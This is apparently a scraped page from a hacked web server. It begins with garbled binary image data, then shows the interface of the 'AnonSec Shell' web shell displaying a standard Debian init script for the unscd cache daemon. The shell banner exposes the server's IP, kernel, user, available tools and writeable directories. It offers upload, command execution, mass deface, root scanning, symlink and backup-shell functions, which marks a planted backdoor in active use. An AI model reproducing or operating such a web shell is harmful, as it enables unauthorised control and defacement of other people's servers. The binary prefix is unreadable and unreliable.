JFIF  H H C nxxd C "     &    !1A2Q"aqBb    1   ? R{~ ,.Y| @sl_޸s[+6ϵG};?2Y`&9LP ?3rj  "@V]:3T -G*P ( *(@AEY]qqqALn +Wtu?)l QU T* Aj- x:˸T u53Vh @PS@ ,i,!"\hPw+E@ ηnu ڶh% (Lvũbb- ?M֍݌٥IHln㏷L(6 9L^"6P  d&1H&8@TUT CJ%eʹFTj4i5=0g J &Wc+3kU@PS@HH33M * "Uc(\`F+b{RxWGk ^#Uj*v' V ,FYKɠMckZٸ]ePP  d\A2glo=WL(6 ^;k"ucoH"b ,PDVlvL_/:̗rN\m dcw T-O$w+FZ5T *Y~l: 99U)8ZAt@GLX*@bijqW;MᎹ،O[5*5*@=qusݝ *EPx՝.~ YИ 3M3@E)GTg%Anp P MUҀhԳW c֦iZ ffR 7qMcyAZT c0bZU k+oG<] APQ T A={PDti@c>>KÚ"q L.1P k6QY7t.k7o  <P &yַܼJZy Wz{UrS @ ~P)Y:A"]Y&ScVO%17 6l4 i4YR5 ruk* ؼdZͨZZ cLakb3N6æ\1`XTloTuT AA 7Uq@2ŬzoʼnБRͪ&8}: e}0ZNΖJ*Ս9˪ޘtao]7$ 9EjS} qt" ( .=Y:V#'H: δ4#6yjѥBB ;WD-ElFf67*\AmAD Q __'2$ TX 9nu'm@iPDT qS`%u%3[nY,  :g = tiX H]ij"+6Z* .~|05s6 ,ǡ ogm+ KtE-BF  ES@(UJ xM~8%g/= Vw[Vh 3lJT  rK -kˎY ٰ  ,ukͱٵf sXDP  ]p]&MS95O+j &f6m463@ t8ЕX=6}HR 5ٶ06 /@嚵*6  " hP@eVDiYQT `7tLf4c?m//B4 laj  L} :E  b#PHQb, yN`rkAb^ |} s4XB4 * ,@[{Ru+%le2} `,kI$U` >OMuh  P % ʵ/ L\5aɕVN1R6 3}ZLj-Dl@ *( K\^i@F@551 k㫖h  Q沬#h XV +;]6z OsFpiX $OQ ) ųl4 YtK'(W AnonSec Shell
AnonSec Shell
Server IP : 20.75.53.88  /  Your IP : 216.73.217.165   [ Reverse IP ]
Web Server : Apache
System : Linux VMRALP-3 4.4.0-256-generic #290~14.04.1-Ubuntu SMP Thu Jun 20 09:24:50 UTC 2024 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29+esm15
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
Domains : 3 Domains
MySQL : ON  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/23604/root/proc/22664/root/etc/init.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /proc/23604/root/proc/22664/root/etc/init.d/unscd
#!/bin/sh
### BEGIN INIT INFO
# Provides:          unscd
# Required-Start:    $remote_fs
# Required-Stop:     $remote_fs
# Default-Start:     2 3 4 5
# Default-Stop:      0 1 6
# Short-Description: Starts the Micro Name Service Cache Daemon
# Description:  This is a daemon which handles passwd and group lookups
#		for running programs and caches the results for the next
#		query.  You should start this daemon only if you use
#		slow Services like NIS or NIS+
### END INIT INFO

# NB: Because insserv is slightly broken (#606593), we cannot provide
# nscd, as this would break installs which hadn't already purged nscd.
# However, if you have init scripts which depend on nscd, feel free to
# change Provides: unscd to Provides: unscd nscd after purging nscd.

#
# unscd:	Starts the Micro Name Service Cache Daemon
#
# description:  This is a daemon which handles passwd and group lookups
#		for running programs and caches the results for the next
#		query.  You should start this daemon only if you use
#		slow Services like NIS or NIS+

# Sanity checks.

NAME="unscd"
DESC="Micro Name Service Cache Daemon"
DAEMON="/usr/sbin/nscd"
PIDFILE="/var/run/nscd/nscd.pid"

# Sanity checks.
umask 022
[ -f /etc/nscd.conf ] || exit 0
[ -x "$DAEMON" ] || exit 0
[ -d /var/run/nscd ] || mkdir -p /var/run/nscd
. /lib/lsb/init-functions

start_unscd()
{
	# Return
	#   0 if daemon has been started
	#   1 if daemon was already running
	#   2 if daemon could not be started
	start-stop-daemon --start --quiet --pidfile "$PIDFILE" --exec "$DAEMON" --test > /dev/null || return 1
	start-stop-daemon --start --quiet --pidfile "$PIDFILE" --exec "$DAEMON" || return 2
}

stop_unscd()
{
	# Return
	#   0 if daemon has been stopped
	#   1 if daemon was already stopped
	#   2 if daemon could not be stopped

	# we try to stop using unscd --shutdown, that fails also if unscd is not present.
	# in that case, fallback to "good old methods"
	RETVAL=0
	if ! $DAEMON --shutdown; then
		start-stop-daemon --stop --quiet --pidfile "$PIDFILE" --name "$NAME" --test > /dev/null
		RETVAL="$?"
		[ "$?" -ne 0  -a  "$?" -ne 1 ] && return 2
	fi

	# Wait for children to finish too
	start-stop-daemon --stop --quiet --oknodo --retry=0/30/KILL/5 --exec "$DAEMON" > /dev/null
	[ "$?" -ne 0  -a  "$?" -ne 1 ] && return 2
	rm -f "$PIDFILE"
	return "$RETVAL"
}

status()
{
	# Return
	#   0 if daemon is stopped
	#   1 if daemon is running
	start-stop-daemon --start --quiet --pidfile "$PIDFILE" --exec "$DAEMON" --test > /dev/null || return 1
	return 0
}

case "$1" in
start)
	log_daemon_msg "Starting $DESC" "$NAME"
	start_unscd
	case "$?" in
		0) log_end_msg 0 ; exit 0 ;;
		1) log_warning_msg " (already running)." ; exit 0 ;;
		*) log_end_msg 1 ; exit 1 ;;
	esac
	;;
stop)
	log_daemon_msg "Stopping $DESC" "$NAME"
	stop_unscd
	case "$?" in
		0) log_end_msg 0 ; exit 0 ;;
		1) log_warning_msg " (not running)." ; exit 0 ;;
		*) log_end_msg 1 ; exit 1 ;;
	esac
	;;
restart|force-reload|reload)
	log_daemon_msg "Restarting $DESC" "$NAME"
	stop_unscd
	$DAEMON --invalidate passwd --invalidate group --invalidate hosts
	case "$?" in
	0|1)
		start_unscd
		case "$?" in
			0) log_end_msg 0 ; exit 0 ;;
			1) log_failure_msg " (failed -- old process is still running)." ; exit 1 ;;
			*) log_failure_msg " (failed to start)." ; exit 1 ;;
		esac
		;;
	*)
		log_failure_msg " (failed to stop)."
		exit 1
		;;
	esac
	;;
status)
	log_daemon_msg "Status of $DESC service: "
	status
	case "$?" in
		0) log_failure_msg "not running." ; exit 1 ;;
		1) log_success_msg "running." ; exit 0 ;;
	esac
	;;
*)
	echo "Usage: /etc/init.d/$NAME {start|stop|reload|force-reload|restart|status}" >&2
	exit 1
	;;
esac


Anon7 - 2022
AnonSec Team